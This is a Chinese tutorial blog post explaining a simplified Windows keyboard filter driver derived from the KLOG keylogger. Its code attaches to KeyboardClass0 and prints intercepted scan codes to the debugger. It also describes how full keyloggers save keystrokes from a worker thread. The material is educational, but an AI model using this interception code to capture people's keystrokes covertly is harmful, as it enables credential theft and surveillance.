键盘过滤驱动对于分层驱动的学习是一个很好的例子,它相对文件过滤驱动来说较为简单,也更容易理解。
并不是所有的驱动都需要直接访问硬件的,事实上几乎所有的硬件设备都存在着驱动程序链,最底层的驱动程序可以直接访问硬件,并对上层提供透明服务,最上层的驱动程序只要对接收到的数据进行过滤、格式化等处理即可,这样大大减少了开发的难度。
我这次学习的对象是KLOG,但我将它的代码进行了精简,这样使得它的工作流程更容易被看清楚。
首先看DriverEntry例程:
NTSTATUS
DriverEntry(
INPDRIVER_OBJECT
pDriverObject,
INPUNICODE_STRING
RegistryPath
)
{
int
i
=
0;
PDEVICE_EXTENSION
pKeyboardDeviceExtension
;
for (i
=
0; i
< IRP_MJ_MAXIMUM_FUNCTION;i
++)
{
pDriverObject
->MajorFunction[i]
= DispatchPassDown;
}
pDriverObject
->MajorFunction[IRP_MJ_READ]
= DispatchRead;
pDriverObject
->DriverUnload
= Unload;
// 开启记录
HookKeyboard(pDriverObject);
// 设置DEVICE_EXTERSION
pKeyboardDeviceExtension
=(PDEVICE_EXTENSION)pDriverObject
->DeviceObject
->DeviceExtension;
returnSTATUS_SUCCESS;
}
很容易看懂,我就不多说了,其中DispatchPassDown仅仅将接收到的IRP转发给下一层设备,代码就不贴了。下面我们先来看其中的重头戏之一:HookKeyboard。
NTSTATUS
HookKeyboard(
INPDRIVER_OBJECT
pDriverObject
)
{
NTSTATUS
status;
PDEVICE_OBJECT
pKeyboardDeviceObject;
PDEVICE_EXTENSION
pKeyboardDeviceExtension
;
STRING
ntNameString;
UNICODE_STRING
uKeyboardDeviceName;
CCHAR
ntNameBuffer[
64]
=
"
\\
Device
\\
KeyboardClass0";
// 创建设备
status
=IoCreateDevice(pDriverObject,
sizeof(DEVICE_EXTENSION),
NULL,
FILE_DEVICE_KEYBOARD,
0,
TRUE,
&pKeyboardDeviceObject);
if (
!NT_SUCCESS(status))
{
returnstatus;
}
pKeyboardDeviceObject
->Flags
|= (DO_BUFFERED_IO |DO_POWER_PAGABLE);
pKeyboardDeviceObject
->Flags
&=
~DO_DEVICE_INITIALIZING;
// 设置DEVICE_EXTENSION
RtlZeroMemory(pKeyboardDeviceObject
->DeviceExtension,
sizeof(DEVICE_EXTENSION));
pKeyboardDeviceExtension
=(PDEVICE_EXTENSION)pKeyboardDeviceObject
->DeviceExtension;
// 绑定到设备
RtlInitAnsiString(
&ntNameString,ntNameBuffer);
RtlAnsiStringToUnicodeSt
ring(
&uKeyboardDeviceName,
&ntNameString,TRUE);
IoAttachDevice(pKeyboardDeviceObject,
&uKeyboardDeviceName,
&pKeyboardDeviceExtension
->pKeyboardDevice);
RtlFreeUnicodeString(
&uKeyboardDeviceName);
returnSTATUS_SUCCESS;
}
首先IoCreateDevice不用多说了,在任何一个驱动程序中都会见到,关键是下面的Flags设置和IoAttachDevice。我们创建了设备之后,需要将其加入到键盘的驱动程序链中,这个具体转化为代码就是将我们的设备Attatch到"\\Device\\KeyboardClass0"中(当然不一定非得是这个设备,挂这个设备的主要目的是为了能够动态卸载我们的驱动,因此不能挂接更上层的设备)。
为了得到按键操作的信息,我们发送一个IRP_MJ_READ到驱动的设备栈,由于此时还不一定有按键产生,于是驱动程序把这个IRP标记为pending状态,一旦有按键产生,则马上把这个IRP完成,所以我们需要在IRP_MJ_READ的处理例程中设置一个完成例程。(因为我们工作的异步模式下)
NTSTATUS
DispatchRead(
INPDEVICE_OBJECT
pDeviceObject,
INPIRP
pIrp
)
{
PIO_STACK_LOCATION
currentIrpStack;
PIO_STACK_LOCATION
nextIrpStack;
currentIrpStack
=IoGetCurrentIrpStackLoca
tion(pIrp);
nextIrpStack
=IoGetNextIrpStackLocatio
n(pIrp);
*nextIrpStack
=
*currentIrpStack;
// 设置完成例程
IoSetCompletionRoutine(pIrp, OnReadCompletion, pDeviceObject, TRUE,TRUE, TRUE);
returnIoCallDriver(((PDEVICE_EXTENSION)pDeviceObject
->DeviceExtension)
->pKeyboardDevice,pIrp);
}
在这个完成例程OnReadCompletion中,我们就可以获取按键的信息了,代码如下所示:
NTSTATUS
OnReadCompletion(
INPDEVICE_OBJECT
pDeviceObject,
INPIRP
pIrp,
INPVOID
Context
)
{
PDEVICE_EXTENSION
pKeyboardDeviceExtension
;
PKEYBOARD_INPUT_DATA
keys;
int
numKeys;
int
i
=
0;
pKeyboardDeviceExtension
=(PDEVICE_EXTENSION)pDeviceObject
->DeviceExtension;
if (pIrp
->IoStatus.Status
== STATUS_SUCCESS)
{
keys
=(PKEYBOARD_INPUT_DATA)pIrp
->AssociatedIrp.SystemBuffer;
numKeys
= pIrp
->IoStatus.Information
/
sizeof(KEYBOARD_INPUT_DATA);
for(i
=
0; i
< numKeys; i
++)
{
DbgPrint(
"ScanCode:%x
\n
",keys[i].MakeCode);
// if(keys[i].Flags == KEY_BREAK)
// DbgPrint("%s\n", "KeyUp");
// if(keys[i].Flags == KEY_MAKE)
// DbgPrint("%s\n", "Key Down");
}
}
if(pIrp
->PendingReturned)
{
IoMarkIrpPending(pIrp);
}
return pIrp
->IoStatus.Status;
}
不过这里我们获取到是只是按键的扫描码,如果想知道直观的按键信息,还需要写个函数进行处理,这里我就给省略了。虽然这个程序比起rootkit.com上面那个KLOG简单的多,使得它的流程更加清楚,也更容易理解,但它不实用。
为什么呢?因为实用的键盘记录器应该能够将按键信息保存起来,这里我们只能通过DbgView来看到按键信息。但由于这个完成例程的IRQL为DISPATCH,不能进行文件操作,因此在KLOG的代码中是首先创建一个线程,然后在线程中进行保存操作,因为线程函数工作在PASSIVE,允许处理文件。
一旦涉及到线程和文件操作就变得麻烦多了,关于这点可以通过KLOG的代码看出来,其实也不难,就是需要考虑的东西较多而已。
最后说一下,这个程序还有一个BUG,就是在卸载的时候再有按键就会BSOD,因为在我们卸载驱动的时候,还有很多IRP处于pending状态,当我们被卸载后,再有按键操作,IRP返回后却找不到对应的驱动,就会造成蓝屏的后果。
关于这个问题,网上有很多文章都介绍了介绍的办法,我也没有实验过,就不废话了。